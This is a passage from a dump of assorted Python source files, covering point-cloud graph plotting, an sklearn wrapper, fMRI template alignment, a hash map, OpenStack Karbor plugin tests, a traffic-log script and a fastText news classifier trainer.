Graph\nimport networkx as nx\nimport dgl\nimport random\n\n\ndef sample_n_points(points, n_points=1024):\n candidate_ids = [i for i in range(points.shape[0])]\n sel = []\n for _ in range(n_points):\n # select idx for closest point and add to id_selections\n idx = random.randint(0,len(candidate_ids)-1)\n sel.append(candidate_ids[idx])\n # remove that idx from point_idx_options\n del candidate_ids[idx]\n return points[sel]\n\ndef plot_points_with_arrow(x, y):\n p_cloud = x\n c_cloud = np.full((len(p_cloud),3),[1, 0.7, 0.75]) # fixed color\n\n p0, nx = y[:3], y[3:]\n nz = np.cross(nx,[0,1,0])\n ny = np.cross(nz,nx)\n\n from plt_viewer import show_points\n show_points(p_cloud,c_cloud,p0=p0,nx=nx,ny=ny,nz=nz)\n\ndef plot_graph(G):\n from pygsp import plotting\n plotting.plot(G,show_edges=True,vertex_size=50)\n plt.show()\n\nif __name__ == '__main__':\n X = np.load(\"../data/val_X.npy\",allow_pickle=True)\n print(\"{} point clouds, cloud 0 has shape {}\".format(X.shape,X[0].shape))\n Y = np.load(\"../data/val_Y.npy\",allow_pickle=True)\n print(\"{} point+normals, p0=Y[0,:3], pn=Y[0,3:]\".format(Y.shape))\n\n idx = 1\n x = sample_n_points(X[idx],n_points=256)\n #plot_points_with_arrow(x, Y[idx])\n\n G = graphs.NNGraph(x,use_flann=True, center=True, k=8)\n plot_graph(G)\n\n g_dgl = dgl.DGLGraph(G)\n\n fig, ax = plt.subplots()\n nx.draw(g_dgl.to_networkx(), ax=ax)\n ax.set_title('Class: {:d}'.format(0))\n plt.show()\n","sub_path":"code/src/visualization/show_graph.py","file_name":"show_graph.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"567727996","text":"from sklearn.feature_extraction import DictVectorizer\nfrom seldon.pipeline.pandas_pipelines import BasePandasEstimator \nfrom collections import OrderedDict\nimport io\nfrom sklearn.utils import check_X_y\nfrom sklearn.utils import check_array\nfrom sklearn.base import BaseEstimator,ClassifierMixin\nimport pandas as pd\n\nclass SKLearnClassifier(BasePandasEstimator,BaseEstimator,ClassifierMixin):\n\n \"\"\"\n Wrapper for XGBoost classifier with pandas support\n XGBoost specific arguments follow https://github.com/dmlc/xgboost/blob/master/python-package/xgboost/sklearn.py\n\n clf : sklearn estimator\n sklearn estimator to run\n target : str\n Target column\n target_readable : str\n More descriptive version of target variable\n included : list str, optional\n columns to include\n excluded : list str, optional\n columns to exclude\n id_map : dict (int,str), optional\n map of class ids to high level names\n sk_args : str, optional\n extra args for sklearn classifier\n \"\"\"\n def __init__(self, clf=None,target=None, target_readable=None,included=None,excluded=None,id_map={},vectorizer=None,**sk_args):\n super(SKLearnClassifier, self).__init__(target,target_readable,included,excluded,id_map)\n self.vectorizer = vectorizer\n self.clf = clf\n self.sk_args = sk_args\n\n def fit(self,X,y=None):\n \"\"\"\n Fit an sklearn classifier to data\n\n Parameters\n ----------\n\n X : pandas dataframe or array-like\n training samples\n y : array like, required for array-like X and not used presently for pandas dataframe\n class labels\n\n Returns\n -------\n self: object\n\n \"\"\"\n if isinstance(X,pd.DataFrame):\n df = X\n (X,y,self.vectorizer) = self.convert_numpy(df)\n else:\n check_X_y(X,y)\n\n self.clf.fit(X,y)\n return self\n\n def predict_proba(self,X):\n \"\"\"\n Returns class probability estimates for the given test data.\n\n X : pandas dataframe or array-like\n Test samples \n \n Returns\n -------\n proba : array-like, shape = (n_samples, n_outputs)\n Class probability estimates.\n \n \"\"\"\n if isinstance(X,pd.DataFrame):\n df = X\n (X,_,_) = self.convert_numpy(df)\n else:\n check_array(X)\n\n return self.clf.predict_proba(X)\n\n\n def predict(self,X):\n \"\"\"\n Returns class predictions\n\n X : pandas dataframe or array-like\n Test samples \n \n Returns\n -------\n proba : array-like, shape = (n_samples, n_outputs)\n Class predictions\n \n \"\"\"\n if isinstance(X,pd.DataFrame):\n df = X\n (X,_,_) = self.convert_numpy(df)\n else:\n check_array(X)\n\n return self.clf.predict(X)\n","sub_path":"python/seldon/sklearn_estimator.py","file_name":"sklearn_estimator.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"588895834","text":"# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the openfmri package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Align two subject template image to each other\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n# magic line for manpage summary\n# man: -*- % cache all files required to generate the portal\n\nimport argparse\nimport os\nimport logging\n\nfrom os.path import join as opj\n\nfrom openfmri import cfg\nfrom . import helpers as hlp\n\nlgr = logging.getLogger(__name__)\nparser_args = dict(formatter_class=argparse.RawDescriptionHelpFormatter)\n\n\ndef setup_parser(parser):\n hlp.parser_add_common_args(parser,\n opt=('datadir', 'dataset', 'subjects', 'workdir'))\n hlp.parser_add_common_args(parser, opt=('label',))\n parser.add_argument('--ref-template',\n help=\"\"\"Reference template label\"\"\")\n parser.add_argument('--in-template',\n help=\"\"\"Input template label\"\"\")\n\nimport sys\nimport os # system functions\nimport nipype.interfaces.io as nio # Data i/o\t\t\nimport nipype.pipeline.engine as pe # pypeline engine\nimport nipype.interfaces.fsl as fsl\n\ndef align_template(wf, label, subj, intmpl, reftmpl, tmpldir):\n in_img = opj(tmpldir, intmpl, 'head.nii.gz')\n in_mask = opj(tmpldir, intmpl, 'brain_mask.nii.gz')\n ref_img = opj(tmpldir, reftmpl, 'head.nii.gz')\n ref_mask = opj(tmpldir, reftmpl, 'brain_mask.nii.gz')\n sink = pe.Node(\n interface=nio.DataSink(\n parameterization=False,\n base_directory=tmpldir,\n regexp_substitutions=[\n ('/[^/]*\\.nii', '.nii'),\n ('/[^/]*\\.mat', '.mat'),\n ]),\n name=\"sub%.3i_sink\" % (subj,),\n overwrite=True)\n\n # alignment to template\n align = pe.Node(\n name='sub%.3i_align' % (subj,),\n interface=fsl.FLIRT(\n #cost='corratio',\n cost='mutualinfo',\n reference=ref_img,\n dof=6,\n interp='sinc'))\n align.inputs.in_file = in_img\n wf.connect(align, 'out_file',\n sink, '%s.in_%s.head.@out' % (intmpl, reftmpl))\n wf.connect(align, 'out_matrix_file',\n sink, '%s.in_%s.xfm_6dof.@out' % (intmpl, reftmpl))\n # project mask\n mask2ref = pe.Node(name='sub%.3i_mask2ref' % (subj,),\n interface=fsl.ApplyXfm(\n interp='nearestneighbour',\n reference=ref_img,\n apply_xfm=True))\n mask2ref.inputs.in_file = in_mask\n wf.connect(align, 'out_matrix_file', mask2ref, 'in_matrix_file')\n wf.connect(mask2ref, 'out_file',\n sink, '%s.in_%s.brain_mask.@out' % (intmpl, reftmpl))\n # invert XFM\n invert_xfm = pe.Node(\n name='sub%.3i_invert_xfm' % (subj,),\n interface=fsl.ConvertXFM(invert_xfm=True))\n wf.connect(align, 'out_matrix_file', invert_xfm, 'in_file')\n wf.connect(invert_xfm, 'out_file',\n sink, '%s.in_%s.xfm_6dof.@out' % (reftmpl, intmpl))\n # ref2tmpl\n ref2tmpl = pe.Node(name='sub%.3i_ref2tmpl' % (subj,),\n interface=fsl.ApplyXfm(\n interp='sinc',\n reference=in_img,\n apply_xfm=True))\n ref2tmpl.inputs.in_file = ref_img\n wf.connect(invert_xfm, 'out_file', ref2tmpl, 'in_matrix_file')\n wf.connect(ref2tmpl, 'out_file',\n sink, '%s.in_%s.head.@out' % (reftmpl, intmpl))\n # rev project mask\n refmask2tmpl = pe.Node(name='sub%.3i_refmask2tmpl' % (subj,),\n interface=fsl.ApplyXfm(\n interp='nearestneighbour',\n reference=in_img,\n apply_xfm=True))\n refmask2tmpl.inputs.in_file = ref_mask\n wf.connect(invert_xfm, 'out_file', refmask2tmpl, 'in_matrix_file')\n wf.connect(refmask2tmpl, 'out_file',\n sink, '%s.in_%s.brain_mask.@out' % (reftmpl, intmpl))\n return wf\n\n\n\ndef run(args):\n # label of the group template -- used to look up config options\n label = args.label\n cfg_section = 'alignsubjtmpl2subjtmpl %s' % label\n\n dataset = hlp.get_cfg_option('common', 'dataset', cli_input=args.dataset)\n\n subjects = hlp.get_dataset_subj_ids(args)\n subjects = hlp.exclude_subjects(subjects, cfg_section)\n\n dsdir = hlp.get_dataset_dir(args)\n\n wf_name = \"alignsubjtmpl2subjtmpl_%s_%s\" % (label, dataset)\n wf = hlp.get_base_workflow(wf_name.replace('.', '_'), args)\n\n ref_tmpl = hlp.get_cfg_option(cfg_section, 'reference template',\n cli_input=args.ref_template)\n in_tmpl = hlp.get_cfg_option(cfg_section, 'input template',\n cli_input=args.in_template)\n\n for subj in subjects:\n subj_tmpldir = os.path.abspath(opj(dsdir, 'sub%.3i' % subj,\n 'templates'))\n wf = align_template(wf, label, subj, in_tmpl,\n ref_tmpl, subj_tmpldir)\n return wf\n\n","sub_path":"openfmri/cmdline/cmd_alignsubjtmpl2subjtmpl.py","file_name":"cmd_alignsubjtmpl2subjtmpl.py","file_ext":"py","file_size_in_byte":5186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"307852446","text":"from typing import Any\n\n# Typically set to power or two or prime number\n_ARRAY_SIZE = 97\n\n\nclass Node:\n\n def __init__(self, key: Any, val: Any, next_node):\n self.key = key\n self.val = val\n self.next = next_node\n\n\nclass HashMap:\n \"\"\"A hash map implemented with chaining.\n\n Cf. open addressing (used by Python). Open addressing is more\n memory efficient, but could end up having to readdress\n everything if the array requires resizing, since the\n hash algorithm requires the addresses to be of fixed size.\n Therefore, even though we may have \"wasted space\", this\n behaves more gracefully as the array fills up.\n\n Operations:\n * Put(key, val): O(1) avg, O(n) worst case (collisions)\n * Get(key): O(1) avg, O(n) worst case\n * Remove(key): O(1) avg, O(n) worst case\n * Contains(key): O(1) avg, O(n) worst case\n \"\"\"\n def __init__(self, size: int = _ARRAY_SIZE):\n \"\"\"Initialize the array with a default size.\"\"\"\n self._arr = [None] * size\n self.size = 0\n\n def put(self, key: Any, val: Any):\n \"\"\"Adds a key and value to the hash map.\n\n 1. Get the hash (index)\n 2. Get the node at that index\n 3. While it's not null...\n 3.1 If the key matches, just update the value (key already exists)\n 4. Set the node at this index to be key, val, and the node at this index if it exists\n (i.e., add it to the front of the linked list)\n\n Time: O(1) average, O(n) worst case\n \"\"\"\n index = self._hash(key)\n node = self._arr[index]\n\n while node:\n if node.key == key:\n # Updating an existing key\n node.val = val\n return\n node = node.next\n\n self.size += 1\n self._arr[index] = Node(key, val, self._arr[index])\n\n def contains(self, key: Any) -> bool:\n \"\"\"Returns True if key exists in map\"\"\"\n index = self._hash(key)\n node = self._arr[index]\n\n while node:\n if node.key == key:\n return True\n node = node.next\n\n return False\n\n def get(self, key: Any) -> Any:\n \"\"\"Returns the value for this key.\"\"\"\n index = self._hash(key)\n node = self._arr[index]\n\n while node:\n if node.key == key:\n return node.val\n node = node.next\n\n raise KeyError('Key not found!')\n\n def delete(self, key: Any) -> None:\n \"\"\"Deletes a key from the hash map in a recursive fashion.\n\n 1. Get the node at this index.\n 2. Call the delete function with this node and key.\n 2.1 If the node is null, raise a KeyError.\n 2.2 If the node.key == key, return next node.\n 2.3 Set node.next to a call with node.next\n 2.4 Return the node.\n\n Time: O(1) average, O(n) worst case.\n \"\"\"\n index = self._hash(key)\n self._arr[index] = self._delete(self._arr[index], key)\n\n def _delete(self, node: Node, key: Any) -> Node:\n \"\"\"Delete helper method.\"\"\"\n if not node:\n raise KeyError('Key not found!')\n\n if key == node.key:\n self.size -= 1\n return node.next\n\n node.next = self._delete(node.next, key)\n return node\n\n def _hash(self, key: Any) -> int:\n \"\"\"Gets a hash index to add the item to in the array.\n\n * Take the abs value of the key's hash, then the modulus\n of the array size.\n\n :param key: The key to add to the hash map.\n :return: The position in the array to add the item.\n \"\"\"\n return abs(hash(key)) % len(self._arr)\n","sub_path":"DSA/data_structures/hash_map.py","file_name":"hash_map.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"422874996","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport collections\nfrom karbor.common import constants\nfrom karbor.context import RequestContext\nfrom karbor.resource import Resource\nfrom karbor.services.protection.bank_plugin import Bank\nfrom karbor.services.protection.bank_plugin import BankPlugin\nfrom karbor.services.protection.bank_plugin import BankSection\nfrom karbor.services.protection.client_factory import ClientFactory\nfrom karbor.services.protection.protection_plugins. \\\n image.image_protection_plugin import GlanceProtectionPlugin\nfrom karbor.services.protection.protection_plugins.image \\\n import image_plugin_schemas\nfrom karbor.tests import base\nimport mock\nfrom oslo_config import cfg\n\n\nclass FakeBankPlugin(BankPlugin):\n def create_object(self, key, value):\n return\n\n def update_object(self, key, value):\n return\n\n def get_object(self, key):\n return\n\n def list_objects(self, prefix=None, limit=None, marker=None):\n return\n\n def delete_object(self, key):\n return\n\n def get_owner_id(self):\n return\n\n\nfake_bank = Bank(FakeBankPlugin())\nfake_bank_section = BankSection(bank=fake_bank, prefix=\"fake\")\n\nResourceNode = collections.namedtuple(\n \"ResourceNode\",\n [\"value\",\n \"child_nodes\"]\n)\n\n\nImage = collections.namedtuple(\n \"Image\",\n [\"disk_format\",\n \"container_format\",\n \"status\"]\n)\n\n\nclass CheckpointCollection(object):\n def __init__(self):\n self.bank_section = fake_bank_section\n\n def get_resource_bank_section(self, resource_id):\n return self.bank_section\n\n\nclass GlanceProtectionPluginTest(base.TestCase):\n def setUp(self):\n super(GlanceProtectionPluginTest, self).setUp()\n self.plugin = GlanceProtectionPlugin()\n cfg.CONF.set_default('glance_endpoint',\n 'http://127.0.0.1:9292',\n 'glance_client')\n\n self.cntxt = RequestContext(user_id='admin',\n project_id='abcd',\n auth_token='efgh')\n self.glance_client = ClientFactory.create_client(\"glance\", self.cntxt)\n self.checkpoint = CheckpointCollection()\n\n def test_get_options_schema(self):\n options_schema = self.plugin.get_options_schema(\n constants.IMAGE_RESOURCE_TYPE)\n self.assertEqual(options_schema, image_plugin_schemas.OPTIONS_SCHEMA)\n\n def test_get_restore_schema(self):\n options_schema = self.plugin.get_restore_schema(\n constants.IMAGE_RESOURCE_TYPE)\n self.assertEqual(options_schema, image_plugin_schemas.RESTORE_SCHEMA)\n\n def test_get_saved_info_schema(self):\n options_schema = self.plugin.get_saved_info_schema(\n constants.IMAGE_RESOURCE_TYPE)\n self.assertEqual(options_schema,\n image_plugin_schemas.SAVED_INFO_SCHEMA)\n\n def test_create_backup(self):\n resource = Resource(id=\"123\",\n type=constants.IMAGE_RESOURCE_TYPE,\n name='fake')\n resource_node = ResourceNode(value=resource,\n child_nodes=[])\n\n fake_bank_section.create_object = mock.MagicMock()\n\n self.plugin._glance_client = mock.MagicMock()\n self.plugin._glance_client.return_value = self.glance_client\n\n self.glance_client.images.get = mock.MagicMock()\n self.glance_client.images.return_value = Image(\n disk_format=\"\",\n container_format=\"\",\n status=\"active\"\n )\n\n fake_bank_section.update_object = mock.MagicMock()\n\n self.glance_client.images.data = mock.MagicMock()\n self.glance_client.images.data.return_value = \"image-data\"\n\n self.plugin.create_backup(self.cntxt, self.checkpoint,\n node=resource_node)\n\n def test_delete_backup(self):\n resource = Resource(id=\"123\",\n type=constants.IMAGE_RESOURCE_TYPE,\n name='fake')\n resource_node = ResourceNode(value=resource,\n child_nodes=[])\n\n fake_bank_section.list_objects = mock.MagicMock()\n fake_bank_section.list_objects.return_value = [\"data_1\", \"data_2\"]\n fake_bank_section.delete_object = mock.MagicMock()\n self.plugin.delete_backup(self.cntxt, self.checkpoint,\n node=resource_node)\n\n def test_get_supported_resources_types(self):\n types = self.plugin.get_supported_resources_types()\n self.assertEqual(types,\n [constants.IMAGE_RESOURCE_TYPE])\n","sub_path":"karbor/tests/unit/protection/test_glance_protection_plugin.py","file_name":"test_glance_protection_plugin.py","file_ext":"py","file_size_in_byte":5188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"566095106","text":"import time\nfrom os import walk\nfrom time import gmtime, strftime\nfrom datetime import date, datetime\n\n\ncount = 0\n\ndef makeCVS(data): \n import csv\n global count \n Header = [[\"Traffic_Type\",\"Message Size (bytes)\",\"Measure Rate (msps)\",\"Time between messages\",\"Msg1\",\"Msg2\",\"Design rate\",\"Design size\"]]\n print(\"data\",data)\n with open('Result.csv', 'a') as csv_file:\n writer = csv.writer(csv_file)\n ##for key, value in data.items():\n print(\"A\")\n if count == 0:\n print(\"B\")\n writer.writerows(Header)\n count = count + 1\n \n print(\"data\", data)\n writer.writerows(data)\n #writer.writerow([key, value])\n print(\"Completed It\")\n\n\nf = [ ]\n\nfor (dirpath, dirnames, filenames) in walk(\"./Get_the_Traffic_Size_Folder\"):\n f.extend(filenames)\n break\ninputFilePointer = []\nfor (dirpath, dirnames, filenames) in walk(\"./Input\"):\n #print(filenames)\n print(\"AA\")\n \n inputFilePointer.extend(filenames)\n #print(filenames)\n\n break\nA= []\nfor i in inputFilePointer:\n if \"send\" in i:\n A.append(i)\n\n \n\ndef getAvgofTrafficMessagePeriod(f):\n\n RecMList, SendMList, = [], []\n designRate = []\n table = [] \n d,b,c =0,0,0\n for i in range( len(f)):\n temp_File = open(\"./Get_the_Traffic_Size_Folder\"+\"/\"+f[i],\"r\")\n input_File = open(\"./Input\"+\"/\"+A[i],\"r\") # Comment out here to \n \n dummy = input_File.readline() \n\n for i in dummy.split():\n if \"[\" in i:\n c=i[1:]\n print(c)\n elif \"]\" in i:\n b = i[:-1]\n print(b)\n #d=b/c\n #exit(0) # To here and run the code and see what happens \n \n \n \n RecMList=[datetime.strptime(line[:15], '%H:%M:%S.%f').strftime('%H:%M:%S.%f') for line in temp_File for word in line.split() if \"RECV\" in word ]\n temp_File.seek(0)\n SendMList = [datetime.strptime(word[5:], '%H:%M:%S.%f').strftime('%H:%M:%S.%f') for line in temp_File for word in line.split() if \"sent>\" in word]\n temp_File.seek(0)\n\n # import numpy as np\n # x = datetime.strptime(\"00:00:00.000000\", '%H:%M:%S.%f') \n # sumOfRecList = abs(RecMList[0]- RecMList[len(RecMList)-1]) # Taking the Average of time \n # for i in range(0,len(RecMList) ):\n # print(RecMList[i])\n # x = RecMList[i] - x\n # print(x)\n # exit(0)\n\n \n #designRate = [for line in Input_File for word in line if word is \"[\" ]\n\n AverageSize = [int(word[5:]) for line in temp_File for word in line.split() if \"size>\" in word]\n \n Msg1 = RecMList[0]\n Msg2 = RecMList[1]\n #lastMsg = RecMList[len(RecMList)-1]\n\n R = [int(i[-6:]) for i in RecMList] \n S = [int(i[-6:]) for i in SendMList]\n # print(\"R is \",R)\n # print(\"S is \", S)\n #exit(0)\n\n getDiffFromRandS = [abs(round((x-y)/1000000,4) ) for x, y in zip(R, S)] \n \n import numpy as np\n import math\n AverageSize = math.ceil(np.mean(AverageSize))\n \n mean = round(np.mean(getDiffFromRandS),4)\n \n msgpersec= 10**len(str(mean)[2:])\n\n table.extend((f[i],AverageSize,msgpersec, mean,Msg1,Msg2))\n print(\"Table:\",table)\n\n makeCVS([table])\n table = []\n \n return table\n\ngetAvgofTrafficMessagePeriod(f)","sub_path":"Get_the_Traffic_Size_Folder/mainInteresting.py","file_name":"mainInteresting.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"145010912","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Author : Joshua\n@Time : 2019/3/14 14:22\n@File : train_top_category.py\n@Desc : 训练英语新闻一级分类\n\"\"\"\n\nimport os\nimport json\nimport time\nimport random\nimport re\nimport string\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom preprocess.common_tools import CleanDoc, read_json_format_file, write_file\nfrom model_normal.fasttext_model import FastTextClassifier\nfrom evaluate.eval_calculate import EvaluateModel\n\n\nimport logging\nfrom utils.logger import Logger\nfrom setting import LOG_PATH\n\nlog_file = os.path.join(LOG_PATH, 'fasttext_train_log')\nlog = Logger(\"fasttext_train_log\", log2console=True, log2file=True, logfile=log_file).get_logger()\n\nclass DataSet(object):\n\n def __init__(self, data_path, business_type='news_category', k=5, logger=None):\n if os.path.exists(data_path) and os.path.isdir(data_path):\n self.data_path = data_path\n else:\n raise Exception('数据路径不存在,请检查路径')\n\n if logger:\n self.log = logger\n else:\n self.log = logging.getLogger(\"fasttext_train_log\")\n self.log.setLevel(logging.INFO)\n self.k = k\n self.bt = business_type\n self.label_idx_map = {\"national\": 4, \"tech\": 10,\n \"sports\": 6, \"science\": 9,\n \"international\": 3, \"business\": 8,\n \"entertainment\": 15, \"lifestyle\": 12,\n \"auto\": 11}\n self.idx_label_map = dict((str(k), v) for v, k in self.label_idx_map.items())\n self.split_dataset()\n\n def split_dataset(self):\n self.log.info(\"预处理数据文件...\")\n # print(\">>>>> 预处理数据文件...\")\n fnames = os.listdir(self.data_path)\n datafiles = [os.path.join(self.data_path, fname) for fname in fnames]\n data_all = list()\n class_cnt = dict()\n s = time.time()\n for datafile in datafiles:\n # print(\">>>>> 正在处理数据文件:{}\".format(datafile))\n self.log.info(\"正在处理数据文件:{}\".format(datafile))\n for line in read_json_format_file(datafile):\n # dataY = line[\"one_level\"]\n if self._preline(line):\n dataX, dataY = self._preline(line).split('\\t__label__')\n dataY = line[\"one_level\"]\n if str(dataY) in class_cnt:\n class_cnt[str(dataY)] += 1\n else:\n class_cnt[str(dataY)] = 1\n if class_cnt[str(dataY)] < 40001 and dataX != \"\":\n data_all.append(line)\n else:\n continue\n e = time.time()\n self.log.info('数据分类耗时: {}s'.format(e - s))\n self.log.info('所有数据分类情况: {}'.format(json.dumps(class_cnt, indent=4)))\n self._generate_kfold_data(data_all)\n return\n\n def _generate_kfold_data(self, data_all):\n \"\"\"\n 按照label分层数据\n :param train_format_data:\n :return:\n \"\"\"\n s = time.time()\n random.shuffle(data_all)\n datax = [self._preline(i).split('\\t__label__')[0] for i in data_all]\n datay = [self._preline(i).split('\\t__label__')[1] for i in data_all]\n e1 = time.time()\n self.log.info('数据分X\\Y耗时: {}s'.format(e1 - s))\n\n skf = StratifiedKFold(n_splits=self.k)\n i = 0\n for train_index, test_index in skf.split(datax, datay):\n i += 1\n e2 = time.time()\n train_label_count = self._label_count([datay[i] for i in train_index])\n test_label_count = self._label_count([datay[j] for j in test_index])\n train_data = [self._preline(data_all[i]) for i in train_index]\n test_data = [self._preline(data_all[j]) for j in test_index]\n train_check = [data_all[i] for i in train_index]\n test_check = [data_all[i] for i in test_index]\n e3 = time.time()\n self.log.info('数据分训练集、测试集耗时: {}s'.format(e3 - e2))\n\n model_data_path = self._mkdir_path(i)\n train_file = os.path.join(model_data_path, 'train.txt')\n test_file = os.path.join(model_data_path, 'test.txt')\n train_check_file = os.path.join(model_data_path, 'train_check.json')\n test_check_file = os.path.join(model_data_path, 'test_check.json')\n write_file(train_file, train_data, 'txt')\n write_file(test_file, test_data, 'txt')\n write_file(train_check_file, train_check, 'json')\n write_file(test_check_file, test_check, 'json')\n\n self.log.info('文件:{}\\n训练数据类别统计:{}'.format(train_file, json.dumps(train_label_count, indent=4)))\n self.log.info('文件:{}\\n测试数据类别统计:{}'.format(test_file, json.dumps(test_label_count, indent=4)))\n if i == 1:\n break\n\n def _preline(self, line_json):\n if not isinstance(line_json, dict):\n self.log.error(\"该文本行不是json类型\")\n raise Exception(\"该文本行不是json类型\")\n title = line_json[\"title\"]\n content = \"\"\n dataY = str(self.label_idx_map.get(line_json[\"one_level\"]))\n\n if \"content\" in line_json:\n content = line_json[\"content\"]\n elif \"html\" in line_json:\n content = self._parse_html(line_json[\"html\"])\n # dataX = clean_string((title + '.' + content).lower()) # 清洗数据\n # dataX = CleanDoc(title.lower()).text # 清洗数据\n dataX = self.clean_title(title) # 清洗数据\n\n if dataX:\n _data = dataX + \"\\t__label__\" + dataY\n return _data\n else:\n return None\n\n\n def _label_count(self, label_list):\n label_count = dict()\n for i in label_list:\n if i in label_count:\n label_count[i] += 1\n else:\n label_count[i] = 1\n return label_count\n\n def _mkdir_path(self, i):\n curr_data_path = os.path.join(self.data_path, \"{}_model_{}\".format(self.bt, i))\n if not os.path.exists(curr_data_path):\n # os.mkdir(data_path)\n model_data_path = os.path.join(curr_data_path, \"data\")\n os.makedirs(model_data_path)\n return model_data_path\n else:\n raise Exception('已存在该路径')\n\n\n def clean_title(self, text):\n text = text.replace(\"\\r\", \" \").replace(\"\\n\", \" \").replace(\"\\t\", \" \")\n text = text.lower()\n no_emoji = CleanDoc(text).remove_emoji(text)\n del_symbol = string.punctuation # ASCII 标点符号\n remove_punctuation_map = dict((ord(char), \" \") for char in del_symbol)\n text = no_emoji.translate(remove_punctuation_map) # 去掉ASCII 标点符号\n text = re.sub(r\"\\s+\", \" \", text)\n return text\n\n\n def _parse_html(self,html):\n pass\n\nclass NewsCategoryModel(object):\n\n def __init__(self, data_path, business_type='news_category', k=5, logger=None):\n if os.path.exists(data_path) and os.path.isdir(data_path):\n self.data_path = data_path\n else:\n raise Exception('数据路径不存在,请检查路径')\n\n if logger:\n self.log = logger\n else:\n self.log = logging.getLogger(\"fasttext_train_log\")\n self.log.setLevel(logging.INFO)\n self.k = k\n self.bt = business_type\n self.label_idx_map = {\"national\": 4, \"tech\": 10,\n \"sports\": 6, \"science\": 9,\n \"international\": 3, \"business\": 8,\n \"entertainment\": 15, \"lifestyle\": 12,\n \"auto\": 11}\n self.idx_label_map = dict((str(k), v) for v, k in self.label_idx_map.items())\n\n def train_model(self):\n for i in range(self.k):\n s = time.time()\n _model = \"{}_model_{}\".format(self.bt, i+1)\n _data_path = os.path.join(self.data_path, _model)\n if os.path.exists(_data_path):\n model_path = os.path.join(_data_path, '{}_model'.format(self.bt))\n train_test_data_path = os.path.join(_data_path, 'data')\n classifier = FastTextClassifier(model_path, train=True, file_path=train_test_data_path, logger=self.log)\n test_check_path = os.path.join(train_test_data_path, 'test_check.json')\n test_check_pred_path = os.path.join(train_test_data_path, 'test_check_pred.json')\n train_check_path = os.path.join(train_test_data_path, 'train_check.json')\n train_check_pred_path = os.path.join(train_test_data_path, 'train_check_pred.json')\n e = time.time()\n self.log.info('训练模型耗时: {}s'.format(e - s))\n # self.predict2file(classifier, train_check_path, train_check_pred_path)\n # self.predict2file(classifier, test_check_path, test_check_pred_path)\n label_list = sorted([self.idx_label_map.get(i.replace(\"__label__\", \"\")) for i in classifier.model.labels])\n self.log.info(\"模型标签:\\n{}\".format(label_list))\n # self.evaluate_model(test_check_pred_path, \"one_level\", labels=label_list)\n else:\n continue\n return\n\n def predict2file(self, classifier, json_file, json_out_file):\n with open(json_out_file, 'w', encoding='utf-8') as joutfile:\n s = time.time()\n for line in read_json_format_file(json_file):\n _data = self._preline(line)\n if _data:\n labels = classifier.predict([_data])\n line['predict_one_level'] = self.idx_label_map[labels[0][0][0].replace(\"'\", \"\").replace(\"__label__\", \"\")]\n # print(line['predict_top_category'])\n line['predict_one_level_proba'] = labels[0][0][1]\n joutfile.write(json.dumps(line) + \"\\n\")\n del line\n else:\n continue\n e = time.time()\n self.log.info('预测及写入文件耗时: {}s'.format(e - s))\n\n def _preline(self, line_json):\n if not isinstance(line_json, dict):\n self.log.error(\"该文本行不是json类型\")\n raise Exception(\"该文本行不是json类型\")\n title = line_json[\"title\"]\n # dataX = clean_string((title + '.' + content).lower()) # 清洗数据\n dataX = self.clean_title(title) # 清洗数据\n if dataX:\n _data = dataX\n return _data\n else:\n return None\n\n def clean_title(self, text):\n text = text.replace(\"\\r\", \" \").replace(\"\\n\", \" \").replace(\"\\t\", \" \")\n text = text.lower()\n no_emoji = CleanDoc(text).remove_emoji(text)\n del_symbol = string.punctuation # ASCII 标点符号,数字\n remove_punctuation_map = dict((ord(char), \" \") for char in del_symbol)\n text = no_emoji.translate(remove_punctuation_map) # 去掉ASCII 标点符号\n text = re.sub(r\"\\s+\", \" \", text)\n return text\n\n def evaluate_model(self, datapath, key_, labels=None):\n em = EvaluateModel(datapath, key_name=key_, logger=self.log, label_names=labels)\n return em.evaluate_model_v2()\n\n\nif __name__ == '__main__':\n s = time.time()\n dataDir = \"/data/en_news\"\n # dataDir = \"/data/emotion_analysis/taste_ft_model\"\n # DataSet(dataDir, logger=log)\n bcm = NewsCategoryModel(dataDir, logger=log)\n bcm.train_model()\n e = time.time()\n print('训练新闻title分类模型耗时{}'.format(e - s))\n\n","sub_path":"nlp/text_categorization/en_news/train_news_category.py","file_name":"train_news_category.py","file_ext":"py","file_size_in_byte":11832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"286320346","text":"import math\nlst1=input().split()\nlst1=list(map(int,lst1))\nlst2=input().split()\nlst2=list(map(int,lst2))\ndef val(lst):\n value = 0\n for i, ch in enumerate(lst.reverse()):\n if int(ch) == 1:\n value += int(math.pow(-2, i))\n else:\n continue\n return value\n \nvalue = val(lst1) + val(lst2)\nres = []\nwhile value:\n res.append(value % (2))\n value = - (value // 2)\nif value==0:\n print([0])\nelse:\n 